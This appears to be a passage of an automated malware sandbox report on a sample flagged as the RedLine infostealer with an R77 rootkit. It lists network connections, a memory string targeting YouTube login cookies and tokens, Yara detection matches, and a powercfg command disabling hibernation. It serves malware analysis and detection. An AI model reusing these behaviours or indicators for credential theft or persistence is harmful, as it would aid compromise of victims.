Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 26 Nov 2022 10:17:49 GMTContent-Type: text/plain; charset=utf-8Content-Length: 10Connection: closeRetry-After: Sat, 26 Nov 2022 11:17:51 GMTX-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Ratelimit-Key: 127.0.0.1,102.129.143.49,102.129.143.49X-Ratelimit-Limit: 10X-Ratelimit-Rate: 600X-Ratelimit-Remaining: 9X-Ratelimit-Reset: 1669457871X-Served-By: Proudly served by DutchCodersStrict-Transport-Security: max-age=63072000

Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249
Source: unknown	TCP traffic detected without corresponding DNS query: 51.68.171.249

Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp

String found in binary or memory: qA:qAZqASet-CookieCookie:www.youtube.comLOGIN_INFOstudio.youtube.com\u003d=%3DPAGE_CLINNERTUBE_API_KEYPAGE_BUILD_LABELINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_SERIALIZED_DELEGATION_CONTEXTINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_HLproductVersionVISITOR_DATAXSRF_TOKENCHANNEL_ID equals www.youtube.com (Youtube)

Source: unknown

HTTP traffic detected: POST /api/proxy/nodes/get HTTP/1.1Content-Type: application/jsonUser-Agent: Microsoft Internet ExplorerHost: api.peer2profit.comContent-Length: 186Cache-Control: no-cache

Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49966 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:50163 version: TLS 1.2

Source: hZDPlQwZ9D.exe, 00000000.00000000.295174463.000000000078A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 61.2.powershell.exe.1cd24a3dc18.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.14001e0b0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.14001e0b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.14001e0b0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd24af6f58.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 13.0.ofg.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 61.2.powershell.exe.1cd24ad3720.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 68.0.winlogon.exe.254b29d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.14001e0b0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd24a3dc18.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0.2.hZDPlQwZ9D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 65.0.dllhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd24ab9470.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 68.0.winlogon.exe.254b29d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.14001e0b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0.3.hZDPlQwZ9D.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 65.0.dllhost.exe.14001e0b0.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0.2.hZDPlQwZ9D.exe.413788.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 61.2.powershell.exe.1cd24af6f58.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd24ab9470.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.14001e0b0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 8.0.ofg.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 65.0.dllhost.exe.14001e0b0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 65.0.dllhost.exe.140000000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd24ad3720.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd249d2c18.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 61.2.powershell.exe.1cd249e7ac8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000044.00000000.554210864.00000254B29D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000041.00000000.537508242.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000041.00000000.541258672.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000041.00000000.535294108.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000041.00000000.539459041.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTR	Matched rule: Detects obfuscated PowerShell Code Author: Florian Roth
Source: C:\Users\user\AppData\Local\Google\ofg.exe, type: DROPPED	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 132

